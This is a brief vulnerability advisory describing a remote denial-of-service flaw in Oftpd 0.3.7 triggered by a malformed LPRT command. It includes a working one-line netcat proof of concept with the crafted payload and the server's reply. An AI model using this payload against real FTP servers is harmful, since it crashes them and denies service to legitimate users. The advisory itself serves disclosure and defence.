Oftpd 0.3.7 Unsupported Address Family Remote Denial of Service Vulnerability



source: http://www.securityfocus.com/bid/22073/info


Oftpd Server is prone to a remote denial-of-service vulnerability because it mishandles unexpected user-supplied input.

Exploiting this issue allows remote attackers to crash the application, denying further service to legitimate users.

Oftpd Server 0.3.7 is reported vulnerable; other versions may also be affected.

nc www.example.com 21 <<< "LPRT 1,16,63,254,47,0,0,32,0,0,0,0,0,0,32,254,143,205,2,141,176"

220 Service ready for new user.
521 Only IPv4 supported, address family (4)